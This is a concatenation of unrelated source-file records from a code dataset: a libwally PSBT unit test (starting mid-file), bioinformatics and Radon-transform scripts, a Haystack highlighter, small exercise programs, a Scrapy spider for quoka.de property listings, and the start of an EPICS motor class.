def _try_get_set_m(self, setfn, sizefn, lenfn, getfn, findfn, psbt, valid_value, valid_item):\n self._try_set(setfn, psbt, valid_value, None)\n self._try_invalid(sizefn, psbt)\n self.assertEqual(sizefn(psbt, 0), 0)\n setfn(psbt, 0, valid_value) # Set\n self.assertEqual(sizefn(psbt, 0), 1) # 1 item in the map\n self._try_invalid(lenfn, psbt, 0)\n with self.assertRaises(ValueError):\n lenfn(psbt, 0, 1) # 
Invalid subindex\n map_val = getfn(psbt, 0, 0)\n self.assertTrue(len(map_val) > 0)\n self.assertEqual(lenfn(psbt, 0, 0), len(map_val))\n self._try_invalid(findfn, psbt, map_val)\n self.assertEqual(findfn(psbt, 0, valid_item), 1)\n\n\n def test_psbt(self):\n psbt = psbt_from_base64(SAMPLE)\n\n # Roundtrip to/from bytes\n psbt_bytes = psbt_to_bytes(psbt, 0)\n psbt_tmp = psbt_from_bytes(psbt_bytes)\n self.assertEqual(hex_from_bytes(psbt_bytes),\n hex_from_bytes(psbt_to_bytes(psbt_tmp, 0)))\n\n self.assertIsNotNone(psbt_get_global_tx(psbt))\n\n for fn, ret in [(psbt_get_version, 0),\n (psbt_get_num_inputs, 1),\n (psbt_get_num_outputs, 1)]:\n self.assertEqual(fn(psbt), ret)\n with self.assertRaises(ValueError):\n fn(None) # Null PSBT\n\n # Conversion to base64 should round trip\n self.assertEqual(psbt_to_base64(psbt, 0), SAMPLE)\n\n # Combining with ourselves shouldn't change the PSBT\n psbt_combine(psbt, psbt)\n self.assertEqual(psbt_to_base64(psbt, 0), SAMPLE)\n\n # Test setters\n dummy_tx = psbt_get_global_tx(psbt)\n self.assertIsNotNone(dummy_tx)\n\n dummy_txout = tx_output_init(1234567, bytearray(b'\\x00' * 33))\n\n dummy_witness = tx_witness_stack_init(5)\n self.assertIsNotNone(dummy_witness)\n\n dummy_bytes = bytearray(b'\\x00' * 32)\n dummy_pubkey = bytearray(b'\\x02'* EC_PUBLIC_KEY_LEN)\n dummy_fingerprint = bytearray(b'\\x00' * BIP32_KEY_FINGERPRINT_LEN)\n dummy_path = [1234, 1234, 1234]\n dummy_sig = bytearray(b'\\x00' * 72)\n if is_elements_build():\n dummy_nonce = bytearray(b'\\x00' * WALLY_TX_ASSET_CT_NONCE_LEN)\n dummy_bf = bytearray(b'\\x00' * BLINDING_FACTOR_LEN)\n dummy_commitment = bytearray(b'\\x00' * ASSET_COMMITMENT_LEN)\n dummy_asset = bytearray(b'\\x00' * ASSET_TAG_LEN)\n\n dummy_keypaths = map_init(0)\n self.assertIsNotNone(dummy_keypaths)\n map_add_keypath_item(dummy_keypaths, dummy_pubkey, dummy_fingerprint, dummy_path)\n self.assertEqual(map_find(dummy_keypaths, dummy_pubkey), 1)\n\n dummy_signatures = map_init(0)\n self.assertIsNotNone(dummy_signatures)\n map_add(dummy_signatures, dummy_pubkey, dummy_sig)\n self.assertEqual(map_find(dummy_signatures, dummy_pubkey), 1)\n\n dummy_unknowns = map_init(1)\n self.assertIsNotNone(dummy_unknowns)\n map_add(dummy_unknowns, dummy_pubkey, dummy_fingerprint)\n self.assertEqual(map_find(dummy_unknowns, dummy_pubkey), 1)\n\n #\n # Inputs\n #\n self._try_set(psbt_set_input_utxo, psbt, dummy_tx)\n self._try_invalid(psbt_get_input_utxo, psbt)\n self._try_set(psbt_set_input_witness_utxo, psbt, dummy_txout)\n self._try_invalid(psbt_get_input_witness_utxo, psbt)\n self._try_get_set_b(psbt_set_input_redeem_script,\n psbt_get_input_redeem_script,\n psbt_get_input_redeem_script_len, psbt, dummy_bytes)\n self._try_get_set_b(psbt_set_input_witness_script,\n psbt_get_input_witness_script,\n psbt_get_input_witness_script_len, psbt, dummy_bytes)\n self._try_get_set_b(psbt_set_input_final_scriptsig,\n psbt_get_input_final_scriptsig,\n psbt_get_input_final_scriptsig_len, psbt, dummy_bytes)\n self._try_set(psbt_set_input_final_witness, psbt, dummy_witness)\n self._try_invalid(psbt_get_input_final_witness, psbt)\n self._try_get_set_m(psbt_set_input_keypaths,\n psbt_get_input_keypaths_size,\n psbt_get_input_keypath_len,\n psbt_get_input_keypath,\n psbt_find_input_keypath,\n psbt, dummy_keypaths, dummy_pubkey)\n self._try_get_set_m(psbt_set_input_signatures,\n psbt_get_input_signatures_size,\n psbt_get_input_signature_len,\n psbt_get_input_signature,\n psbt_find_input_signature,\n psbt, dummy_signatures, dummy_pubkey)\n 
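# Proprietary/unknown key-value pairs round-trip through the same map accessors.\n        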
self._try_get_set_m(psbt_set_input_unknowns,\n psbt_get_input_unknowns_size,\n psbt_get_input_unknown_len,\n psbt_get_input_unknown,\n psbt_find_input_unknown,\n psbt, dummy_unknowns, dummy_pubkey)\n self._try_set(psbt_set_input_sighash, psbt, 0xff, 0x0)\n self.assertEqual(psbt_get_input_sighash(psbt, 0), 0)\n self._try_invalid(psbt_get_input_sighash, psbt)\n\n if is_elements_build():\n self._try_set(psbt_set_input_value, psbt, 1234567, 0)\n self._try_invalid(psbt_has_input_value, psbt)\n self._try_invalid(psbt_get_input_value, psbt)\n self._try_invalid(psbt_clear_input_value, psbt)\n self.assertEqual(psbt_has_input_value(psbt, 0), 1)\n psbt_clear_input_value(psbt, 0)\n self.assertEqual(psbt_has_input_value(psbt, 0), 0)\n self._try_get_set_b(psbt_set_input_vbf,\n psbt_get_input_vbf,\n psbt_get_input_vbf_len, psbt, dummy_bf)\n self._try_get_set_b(psbt_set_input_asset,\n psbt_get_input_asset,\n psbt_get_input_asset_len, psbt, dummy_asset)\n self._try_get_set_b(psbt_set_input_abf,\n psbt_get_input_abf,\n psbt_get_input_abf_len, psbt, dummy_bf)\n self._try_set(psbt_set_input_pegin_tx, psbt, dummy_tx)\n self._try_invalid(psbt_get_input_pegin_tx, psbt)\n self._try_get_set_b(psbt_set_input_txoutproof,\n psbt_get_input_txoutproof,\n psbt_get_input_txoutproof_len, psbt, dummy_bytes)\n self._try_get_set_b(psbt_set_input_genesis_blockhash,\n psbt_get_input_genesis_blockhash,\n psbt_get_input_genesis_blockhash_len, psbt, dummy_bytes)\n self._try_get_set_b(psbt_set_input_claim_script,\n psbt_get_input_claim_script,\n psbt_get_input_claim_script_len, psbt, dummy_bytes)\n\n #\n # Outputs\n #\n self._try_get_set_b(psbt_set_output_redeem_script,\n psbt_get_output_redeem_script,\n psbt_get_output_redeem_script_len, psbt, dummy_bytes)\n self._try_get_set_b(psbt_set_output_witness_script,\n psbt_get_output_witness_script,\n psbt_get_output_witness_script_len, psbt, dummy_bytes)\n self._try_get_set_m(psbt_set_output_keypaths,\n psbt_get_output_keypaths_size,\n psbt_get_output_keypath_len,\n psbt_get_output_keypath,\n psbt_find_output_keypath,\n psbt, dummy_keypaths, dummy_pubkey)\n self._try_get_set_m(psbt_set_output_unknowns,\n psbt_get_output_unknowns_size,\n psbt_get_output_unknown_len,\n psbt_get_output_unknown,\n psbt_find_output_unknown,\n psbt, dummy_unknowns, dummy_pubkey)\n if is_elements_build():\n self._try_get_set_b(psbt_set_output_blinding_pubkey,\n psbt_get_output_blinding_pubkey,\n psbt_get_output_blinding_pubkey_len, psbt, dummy_pubkey)\n self._try_get_set_b(psbt_set_output_value_commitment,\n psbt_get_output_value_commitment,\n psbt_get_output_value_commitment_len, psbt, dummy_commitment)\n self._try_get_set_b(psbt_set_output_vbf,\n psbt_get_output_vbf,\n psbt_get_output_vbf_len, psbt, dummy_bf)\n self._try_get_set_b(psbt_set_output_asset_commitment,\n psbt_get_output_asset_commitment,\n psbt_get_output_asset_commitment_len, psbt, dummy_commitment)\n self._try_get_set_b(psbt_set_output_abf,\n psbt_get_output_abf,\n psbt_get_output_abf_len, psbt, dummy_bf)\n self._try_get_set_b(psbt_set_output_nonce,\n psbt_get_output_nonce,\n psbt_get_output_nonce_len, psbt, dummy_nonce)\n self._try_get_set_b(psbt_set_output_rangeproof,\n psbt_get_output_rangeproof,\n psbt_get_output_rangeproof_len, psbt, dummy_bytes)\n self._try_get_set_b(psbt_set_output_surjectionproof,\n psbt_get_output_surjectionproof,\n psbt_get_output_surjectionproof_len, psbt, dummy_bytes)\n\n\nif __name__ == '__main__':\n 
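# Run the PSBT round-trip tests when this file is executed directly.\n    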
unittest.main()\n","sub_path":"src/swig_python/contrib/psbt.py","file_name":"psbt.py","file_ext":"py","file_size_in_byte":11572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"423939264","text":"'''\r\nCreated on Nov 10, 2013\r\n\r\n@author: Zoya\r\n'''\r\nfrom REVC import reverse_char\r\nFALSE_RETURN = 'FALSE'\r\n\r\ndef get_deBruijn_graph(lines, k):\r\n result = dict()\r\n for line in lines:\r\n rev_line = ''\r\n for letter in reversed(line):\r\n rev_line += reverse_char(letter)\r\n for i in range(len(line) - k):\r\n result[line[i:i + k]] = line[i + k]\r\n result[rev_line[i:i + k]] = rev_line[i + k ]\r\n print (\"de Bruijn graph for k = %d (len = %d)\" % (k, len(result)))\r\n# print result\r\n return result\r\n\r\ndef get_cyclic_superstring(deBruijn_graph):\r\n result = deBruijn_graph.keys()[0]\r\n next_line = result\r\n for i in range(len(deBruijn_graph) / 2):\r\n if not deBruijn_graph.get(next_line):\r\n return FALSE_RETURN\r\n result += deBruijn_graph.pop(next_line)\r\n next_line = result[-len(next_line):]\r\n# print result\r\n result = deBruijn_graph.keys()[0]\r\n next_line = result\r\n for i in range(len(deBruijn_graph)):\r\n if not deBruijn_graph.get(next_line):\r\n return FALSE_RETURN\r\n result += deBruijn_graph.pop(next_line)\r\n next_line = result[-len(next_line):]\r\n# print result\r\n if len(deBruijn_graph) > 0:\r\n return FALSE_RETURN\r\n return result[:-len(next_line)]\r\n\r\ndef GASM(input_file, output_file):\r\n lines = [line.strip() for line in open(input_file)]\r\n for k in range(min([len(line) for line in lines]) - 1, -1, -1):\r\n deBruijn_graph = get_deBruijn_graph(lines, k)\r\n result = get_cyclic_superstring(deBruijn_graph)\r\n if result != FALSE_RETURN:\r\n break\r\n print (result)\r\n with open(output_file, \"w\") as result_file:\r\n result_file.write(result)\r\n\r\nGASM(\"src/data/rosalind_gasm.txt\", \"src/data/rosalind_gasm_result.txt\")\r\n","sub_path":"src/com/zobar/rosalind/GASM.py","file_name":"GASM.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"519315412","text":"import numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom skimage import data\nimport radon as rn\nfrom multiprocessing import Process\n\n#CHANGE THIS VALUES\nstep = [45,40,35,30,20,15,10,5,3,2,1,0.5]\ndetectors = [400,350,300,250,200,150,100,50,25]\ndetWidth = [30,45,60,75,90,105,120,135,150,165,180]\n\ndef returnDifference2D(input1, input2):\n if (len(input1) != len(input2)) or (len(input1[0]) != len(input2[0])) : raise NameError(\"Arrays do not have the same size\")\n val = 0\n for X in range(0,len(input1)):\n for Y in range(0, len(input1[0])):\n val += np.power((input1[X,Y]-input2[X,Y]),2)\n return np.sqrt(val)\n\ndef testIterations(step, detectors, width, filter, figSaveName, prefix=\"\"):\n inData = data.imread(\"input.png\", as_grey=True)\n inData = inData/max( inData.flatten() )\n num=0\n stepsArray = np.arange(0, 180, step)\n result = np.zeros(len(stepsArray))\n sinogram = None\n inverseImage = None\n for S, SVal in enumerate(stepsArray):\n num += 1\n sinogram = rn.radonTransform(inData, step, [SVal], detectors, width, sinogram, normalize=False)\n sin2 = sinogram.copy()\n sin2 /= max(sin2.flatten())\n if filter:\n sin2 = rn.filterSinogram(sin2)\n inverseImage = rn.inverseRadonTransform(sin2, step, [SVal], detectorsWidth=width,\n outputWidth=len(inData[0]), outputHeight=len(inData), 
output=inverseImage, normalize=False)\n else:\n inverseImage = rn.inverseRadonTransform(sin2, step, [SVal], detectorsWidth=width,\n outputWidth=len(inData[0]), outputHeight=len(inData), output=inverseImage, normalize=False)\n\n copy = inverseImage.copy()\n for X in range(0,len(copy)):\n for Y in range(0,len(copy[0])):\n if copy[X][Y] <0: copy[X][Y] =0;\n copy /= max(copy.flatten())\n result[S] = returnDifference2D(inData, copy)\n print(\n \"{}{}. {:.2f}% --- step:{} detectorsNum:{} width:{} result:{}\".format(prefix, num, (num / len(stepsArray) * 100), SVal,\n detectors, width, result[S]))\n\n plot2D(stepsArray, result, \"interation\", figSaveName, line=\"bo\")\n saveDataToFile(step,detectors,width,result,figSaveName)\n\n return\n\n\ndef testAlgorithm(stepArr, detectorsArr, widthArr, filter, figSaveName, prefix=\"\"):\n result = np.zeros((len(stepArr), len(detectorsArr), len(widthArr)))\n num=0\n all=len(stepArr)*len(detectorsArr)*len(widthArr)\n inData = data.imread(\"input.png\", as_grey=True)\n inData = inData/max( inData.flatten() )\n\n for S, SVal in enumerate(stepArr):\n for D, DVal in enumerate(detectorsArr):\n for W, WVal in enumerate(widthArr):\n num+=1\n\n sinogram = rn.radonTransform(inData, stepSize=SVal, detectorsNumber=DVal, detectorsWidth=WVal)\n if filter: sinogram = rn.filterSinogram(sinogram)\n inverseRadonImage = rn.inverseRadonTransform(sinogram, stepSize=SVal, detectorsWidth=WVal, outputWidth=len(inData[0]), outputHeight=len(inData))\n\n result[S,D,W] = returnDifference2D(inData, inverseRadonImage)\n print(\"{}{}. {:.2f}% --- step:{} detectorsNum:{} width:{} result:{}\".format(prefix,num,(num/all*100),SVal,DVal,WVal,result[S,D,W]))\n\n smart4DPlot(stepArr, detectorsArr, widthArr, result, figSaveName)\n return\n\ndef plot2D(X,Y,labelX, figSaveName, labelY=\"variation\", line='--bo'):\n plt.gcf().clear()\n plt.plot(X,Y,line)\n plt.xlabel(labelX)\n plt.ylabel(labelY)\n plt.savefig(figSaveName+\".pdf\")\n return\n\ndef plot3D(X,Y,Z,labelX, labelY, figSaveName, labelZ=\"variation\"):\n plt.gcf().clear()\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n cartesian = np.array([ [x,y] for x in X for y in Y ])\n ax.scatter(cartesian[:,0],cartesian[:,1],Z)\n ax.set_xlabel(labelX)\n ax.set_ylabel(labelY)\n ax.set_zlabel(labelZ)\n plt.savefig(figSaveName+\".pdf\")\n return\n\ndef plot4D(X,Y,Z,A, labelX, labelY, labelZ, figSaveName, labelA=\"variation\"):\n plt.gcf().clear()\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n cartesian = np.array([[x, y, z] for x in X for y in Y for z in Z])\n plt.gca().invert_yaxis()\n sp = ax.scatter(cartesian[:,0],cartesian[:,1],cartesian[:,2], c=A, cmap=plt.hot(), marker=\"h\")\n ax.set_xlabel(labelX)\n ax.set_ylabel(labelY)\n ax.set_zlabel(labelZ)\n bar = plt.colorbar(sp)\n bar.set_label(labelA)\n plt.savefig(figSaveName+\".pdf\")\n plt.show()\n return\n\ndef saveDataToFile(X, Y, Z, data, figSaveName):\n with open(figSaveName+\"txt\",\"w\") as file:\n file.write(str(X)+\"\\n\\n\")\n file.write(str(Y)+\"\\n\\n\")\n file.write(str(Z)+\"\\n\\n\")\n file.write(str(data)+\"\\n\\n\")\n\ndef smart4DPlot(X, Y, Z, data, figSaveName, labelX=\"Step\", labelY=\"Number of detectors\", labelZ=\"Detectors width\"):\n saveDataToFile(X,Y,Z,data,figSaveName)\n\n if(len(X)==1 and len(Y)==1 and len(Z)>1 ):\n plot2D(Z, data[0,0,:], labelZ, figSaveName)\n return\n if(len(X)==1 and len(Y)>1 and len(Z)==1 ):\n plot2D(Y, data[0,:,0], labelY, figSaveName)\n return\n if(len(X)>1 and len(Y)==1 and len(Z)==1 ):\n plot2D(X, data[:,0,0], 
labelX, figSaveName)\n return\n if(len(X)>1 and len(Y)>1 and len(Z)==1):\n plot3D(X,Y,data[:,:,0], labelX, labelY, figSaveName)\n return\n if (len(X)==1 and len(Y) > 1 and len(Z)>1):\n plot3D(Y,Z,data[0,:,:], labelY, labelZ, figSaveName)\n return\n if (len(X)>1 and len(Y)==1 and len(Z)>1):\n plot3D(X,Z,data[:,0,:], labelX, labelZ, figSaveName)\n return\n plot4D(X,Y,Z,data,labelX,labelY,labelZ, figSaveName)\n return\n\ndef runInParallel(*fns):\n proc = []\n for fn in fns:\n p = Process(target=fn)\n p.start()\n proc.append(p)\n for p in proc:\n p.join()\n\ndef main():\n def test1():\n testAlgorithm(step, detectors, detWidth, True, \"main4DFilter\", prefix=\"test1: \")\n def test2():\n testAlgorithm(step, detectors, detWidth, False, \"main4DNoFilter\", prefix=\"test2: \")\n def test3():\n testAlgorithm([1], [200], detWidth, True, \"main2DFilterStep1Detectors200\", prefix=\"test3: \")\n def test4():\n testAlgorithm([1], [200], detWidth, False, \"main2DNoFilterStep1Detectors200\", prefix=\"test4: \")\n def test5():\n testAlgorithm(step, [200], [170], True, \"main2DFilterDetectors200Width170\", prefix=\"test5: \")\n def test6():\n testAlgorithm(step, [200], [170], False, \"main2DNoFilterDetectors200Width170\", prefix=\"test6: \")\n def test7():\n testAlgorithm([1], detectors, [170], True, \"main2DFilterStep1Width170\", prefix=\"test7: \")\n def test8():\n testAlgorithm([1], detectors, [170], False, \"main2DNoFilterStep1Width170\", prefix=\"test8: \")\n def test9(): #TEST ITERACJI\n testIterations(1, 200, 170, True, \"testIterationsFilterStep1Ditectors200Width170\", prefix=\"test9: \")\n def test10(): # TEST ITERACJI\n testIterations(1, 200, 170, False, \"testIterationsNoFilterStep1Ditectors200Width170\", prefix=\"test10: \")\n\n\n runInParallel(test1,test2,test3,test4,test5,test6,test7,test8,test9,test10)\n return\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"425480531","text":"with open(\"C:/bigdata/Jump_to_Python\\chap04/20180509(수)/방명록.txt\", 'r', encoding='utf-8') as f:\n visitors_list = []\n\n while True:\n visitors_temp = f.readline()\n if not visitors_temp: break\n visitors_list.append(visitors_temp.replace('\\n', ''))\n check_name = input(\"이름을 입력하세요 : \")\n check_flag = False\n for i in visitors_list:\n\n name, birth = map(str, i.split(' '))\n if check_name == name:\n print(\"%s님 다시 방문해 주셔서 감사합니다. 즐거운 시간되세요.\"%check_name)\n check_flag = True\n break\n\nif not check_flag:\n with open(\"C:/bigdata/Jump_to_Python\\chap04/20180509(수)/방명록.txt\", 'a', encoding='utf-8') as f:\n birth = input(\"생년월일을 입력하세요 (예:801212) : \")\n f.write(\"\\n\" + check_name + \" \" + birth)\n print(\"%s님 환영합니다. 
아래 내용을 입력하셨습니다.\"% check_name)\n print(\"%s %s\"%(check_name,birth))","sub_path":"01_jumptopy/Jump_to_Python/chap04/20180509(수)/visitors_book.py","file_name":"visitors_book.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"510283188","text":"# -*- coding:utf-8 -*-\nimport sys,json\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nfrom haystack.utils import Highlighter\n\nSYMBOL='。'\n\ndef find_symbol(text_block):\n word_positions = {}\n\n # Pre-compute the length.\n end_offset = len(text_block)\n lower_text_block = text_block.lower()\n # 测试\n for word in ['。', '\\n']:\n if not word in word_positions:\n word_positions[word] = []\n\n start_offset = 0\n\n while start_offset < end_offset:\n # print word\n next_offset = lower_text_block.find(word, start_offset, end_offset)\n\n # If we get a -1 out of find, it wasn't found. Bomb out and\n # start the next word.\n if next_offset == -1:\n break\n\n word_positions[word].append(next_offset)\n start_offset = next_offset + len(word)\n symbol_location_list=word_positions[SYMBOL]\n symbol_location_list.insert(0,0)\n symbol_location_list.insert(-1,len(text_block))\n symbol_location_list.sort()\n return symbol_location_list\n\nclass CustomHighlighter(Highlighter):\n\n def render_html(self, highlight_locations=None, start_offset=None, end_offset=None):\n # Start by chopping the block down to the proper window.\n text = self.text_block[start_offset:end_offset]\n\n # Invert highlight_locations to a location -> term list\n term_list = []\n\n for term, locations in highlight_locations.items():\n term_list += [(loc - start_offset, term) for loc in locations]\n\n loc_to_term = sorted(term_list)\n\n # Prepare the highlight template\n if self.css_class:\n hl_start = '<%s class=\"%s\">' % (self.html_tag, self.css_class)\n else:\n hl_start = '<%s>' % (self.html_tag)\n\n hl_end = '</%s>' % self.html_tag\n\n # Copy the part from the start of the string to the first match,\n # and there replace the match with a highlighted version.\n highlighted_chunk = \"\"\n matched_so_far = 0\n prev = 0\n prev_str = \"\"\n\n for cur, cur_str in loc_to_term:\n # This can be in a different case than cur_str\n actual_term = text[cur:cur + len(cur_str)]\n\n # Handle incorrect highlight_locations by first checking for the term\n if actual_term.lower() == cur_str:\n if cur < prev + len(prev_str):\n continue\n\n highlighted_chunk += text[prev + len(prev_str):cur] + hl_start + actual_term + hl_end\n prev = cur\n prev_str = cur_str\n\n # Keep track of how far we've copied so far, for the last step\n matched_so_far = cur + len(actual_term)\n\n # Don't forget the chunk after the last term\n highlighted_chunk += text[matched_so_far:]\n symbol_location_list = find_symbol(self.text_block)\n\n # print highlight_locations.items()\n start_offset_ext=start_offset\n end_offset_ext=end_offset\n for i in range(0, len(symbol_location_list)-1):\n\n # if symbol_location_list[i] < start_offset:\n # print symbol_location_list[i],symbol_location_list[i+1],\"%%%%\"\n if symbol_location_list[i+1]>start_offset:\n\n start_offset_ext = symbol_location_list[i]\n end_offset_ext = symbol_location_list[i + 1]\n break\n if start_offset-start_offset_ext>50:\n start_offset_ext=start_offset-50\n\n if end_offset_ext-end_offset>50:\n end_offset_ext=end_offset+50\n\n if end_offset_ext>end_offset:\n highlighted_chunk=self.text_block[start_offset_ext:start_offset]+highlighted_chunk\n else:\n 
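# Keep the leading context, the highlighted window, and any trailing context.\n            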
highlighted_chunk=self.text_block[start_offset_ext:start_offset]+highlighted_chunk+self.text_block[end_offset:end_offset_ext]\n\n\n if start_offset_ext > 0:\n highlighted_chunk = '。。%s' % highlighted_chunk\n\n if end_offset_ext < len(self.text_block):\n highlighted_chunk = '%s。。。' % highlighted_chunk\n\n return highlighted_chunk","sub_path":"elastic_haystack/basesearch/customhighlighter.py","file_name":"customhighlighter.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"255921098","text":"class Solution(object):\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: List[int]\n \"\"\"\n post = [[] for i in range(numCourses)]\n prerequisite = [0] * numCourses\n l = []\n ans = []\n \n for pairs in prerequisites:\n post[pairs[1]].append(pairs[0])\n prerequisite[pairs[0]] += 1\n \n for i, v in enumerate(prerequisite):\n if v == 0:\n l.append(i)\n\n while l:\n node_remove = l.pop()\n ans.append(node_remove)\n for node in post[node_remove]:\n prerequisite[node] -= 1\n if prerequisite[node] == 0:\n l.append(node)\n\n if len(ans) == numCourses:\n return True\n return False\n","sub_path":"online_judge/leetcode_py/207. Course Schedule.py","file_name":"207. Course Schedule.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"143340019","text":"# File: q2.py\n#\n# ===============================================\n# Problem\n# ===============================================\n# A certain CS professor gives 5-point quizzes that are graded on the scale\n# 5-A, 4-B, 3-C, 2-D, 1-F, 0-F. Write a program that accepts a quiz score as\n# an input and prints out the corresponding grade.\n\ndef main():\n # Program description\n print(\"Test Score Calculator\\n\")\n\n # Input\n score = eval(input(\"Enter a students grade in a 0-5 range: \"))\n\n scoreScale = ['F', 'F', 'D', 'C', 'B', 'A']\n\n print(\"Students score is:\", scoreScale[score])\n\nmain()\n","sub_path":"exercises/ch5/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"227020944","text":"# -*- coding: utf-8 -*-\nimport re\nimport time\nfrom datetime import datetime\n\nimport dateparser\nimport scrapy\n\nfrom quoka.items import QuokaItem\n\n\ndef build_full_url(url):\n return 'http://www.quoka.de' + url\n\n\ndef get_data(response):\n data = {}\n data['comm'] = response.meta['comm']\n data['classtype'] = response.meta['classtype']\n return data\n\n\nclass QuokaSpider(scrapy.Spider):\n name = 'quoka_spider'\n allowed_domains = ['quoka.de']\n start_urls = [\"http://www.quoka.de/immobilien/bueros-gewerbeflaechen/\"]\n\n counter = 0\n\n def parse(self, response):\n for comm in (0, 1):\n data = {'comm': str(comm), 'classtype': 'of'}\n yield scrapy.http.FormRequest.from_response(response,\n formname=\"frmNaviSearch\",\n formdata=data,\n url=response.url,\n meta=data,\n callback=self.cities)\n\n def cities(self, response):\n city_block = response.xpath(\n '//form[@class=\"SearchFormInsert\"]/.//div[@class=\"cnt\"]')\n data = get_data(response)\n if len(city_block) > 0:\n city_block = city_block[-1]\n\n for city_link in city_block.xpath('.//ul/li/ul/li/a/@href').extract():\n url = build_full_url(city_link)\n yield scrapy.http.FormRequest.from_response(response,\n url=url,\n 
formname=\"frmNaviSearch\",\n formdata=data,\n meta=data,\n callback=self.page)\n\n def page(self, response):\n next_page = response.xpath(\n '//div[@class=\"rslt-pagination\"]/div/ul/li[contains(@class, \"arr-rgt\") and contains(@class, \"active\")]/a/@href')\n\n data = get_data(response)\n if next_page:\n if len(next_page) > 1:\n next_page = next_page[0]\n url = build_full_url(next_page.extract())\n data['pageno'] = response.xpath(\n '//div[@class=\"rslt-pagination\"]/div/ul/li[contains(@class, \"arr-rgt\") and contains(@class, \"active\")]/a/@data-qng-page')[0].extract()\n\n yield scrapy.http.FormRequest.from_response(response,\n url=url,\n formname=\"frmNaviSearch\",\n formdata=data,\n meta=data,\n callback=self.page)\n\n data = get_data(response)\n item_list = response.xpath(\n '//div[@id=\"ResultListData\"]/ul/li[@class=\"q-ln hlisting\"]')\n for item in item_list:\n href = item.xpath('.//a/@href')[0].extract()\n url = build_full_url(href)\n yield scrapy.Request(url=url,\n meta=data,\n callback=self.item)\n\n def item(self, response):\n self.counter += 1\n i = QuokaItem()\n i['url'] = response.url\n i['erzeugt_am'] = int(time.mktime(datetime.now().timetuple()))\n\n i['Uberschrift'] = response.xpath(\n '//div[@class=\"headline\"]/h1/text()')[0].extract()\n i['PLZ'] = response.xpath(\n '//span[@class=\"postal-code\"]/text()')[0].extract()\n i['OBID'] = response.xpath(\n '//div[contains(text(),\"Anzeige\")]/following-sibling::strong/text()')[0].extract().strip()\n\n i['Beschreibung'] = response.xpath(\n '//div[@class=\"details\"]/div[@class=\"text\"]/text()')[0].extract()\n\n i['Monat'] = datetime.now().month\n try:\n date_string = response.xpath(\n '/html/body/div[3]/div[2]/div[1]/main/div[8]/div/div[3]/div[2]/div[2]/div[4]/following-sibling::text()[1]')[0].extract()\n dt = dateparser.parse(date_string.strip())\n i['Erstellungsdatum'] = int(time.mktime(dt.timetuple()))\n except:\n # Wrong format 'Heute, 22:50 Uhr'\n pass\n i['Gewerblich'] = response.meta['comm']\n i['Stadt'] = response.xpath(\n '//span[@class=\"address location\"]//span[@class=\"locality\"]'\n '/text()').extract_first()\n try:\n i['Kaufpreis'] = response.xpath(\n '//div[@class=\"price\"]//span/text()')[0].extract()\n except:\n # No price on site\n pass\n try:\n i['Immobilientyp'] = response.xpath(\n '/html/body/div[3]/div[2]/header/div[4]/div/div[2]/span[3]/a/span/span/text()')[0].extract()\n\n except:\n pass\n\n telefon_url = response.xpath(\n '//a[contains(@onclick,\"displayphonenumber.php\")]'\n '/@onclick').extract_first()\n if telefon_url:\n m = re.search('load\\( \\'(.+?)\\'', telefon_url)\n if m:\n url = m.group(1)\n request = scrapy.Request(\n response.urljoin(url), self.phone)\n request.meta['item'] = i\n yield request\n else:\n yield i\n\n def phone(self, response):\n i = response.meta['item']\n try:\n i['Telefon'] = response.xpath(\n '/html/body/div[3]/div[2]/div[1]/main/div[8]/div/div[4]/div[1]/div/ul/li/span[2]/span/text()').extract()[0]\n print(i['Telefon'])\n except:\n i['Anbieter_ID'] = u\"Immobilienscout24\"\n return i\n","sub_path":"quoka/quoka/spiders/quoka_spider.py","file_name":"quoka_spider.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"255338197","text":"def gen(number):\n nr = sorted(number)\n return \"\".join(nr) + \"-\" + \"\".join(reversed(nr))\n\ndef calc(number):\n total = 1\n while True:\n nr = number.split(\"-\")\n smal = nr[0]\n large = nr[1]\n summ = str(int(large)-int(smal))\n 
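# Kaprekar's routine works on four-digit strings, so pad short differences (e.g. 999 -> 0999) with leading zeros.\n        summ = summ.zfill(4)\n        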
print(large + \" - \" + smal + \" = \" + summ)\n\n if summ == \"6174\":\n print(\"\\n\" + \"Total: \" + str(total))\n break\n else:\n total += 1\n number = gen(summ)\n\nif __name__ == \"__main__\":\n while True:\n try:\n n = int(input(\"Skriv ett fyrsiffrigt tal: \"))\n if not len(str(n)) == 4:\n continue\n break\n except:\n continue\n print()\n\n calc(gen(str(n)))\n","sub_path":"DattarayaRamchandraKaprekar.py","file_name":"DattarayaRamchandraKaprekar.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"34124805","text":"from epics import PV\nfrom slic.devices.general.motor import Motor\n\n\nclass EXP:\n\n def __init__(self, Id, alias_namespace=None):\n self.Id = Id\n\n ### motors 1.5M JF Zaber ###\n #self.det_x = Motor(Id + ':MOT_TX')\n #self.det_y = Motor(Id + ':MOT_TY')\n self.zaber_x = Motor(Id + \":MOT_TZ\")\n 